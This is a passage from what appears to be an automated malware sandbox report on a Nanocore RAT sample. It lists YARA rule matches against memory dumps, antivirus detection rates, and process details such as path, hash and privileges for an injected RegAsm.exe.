                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 30%, ReversingLabs
                                                                  Reputation:low

                                                                  General

                                                                  Start time:08:05:36
                                                                  Start date:09/06/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                  Imagebase:0x3c0000
                                                                  File size:64672 bytes
                                                                  MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  Antivirus matches:
                                                                  • Detection: 0%, Metadefender, Browse
                                                                  • Detection: 0%, ReversingLabs
                                                                  Reputation:moderate

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >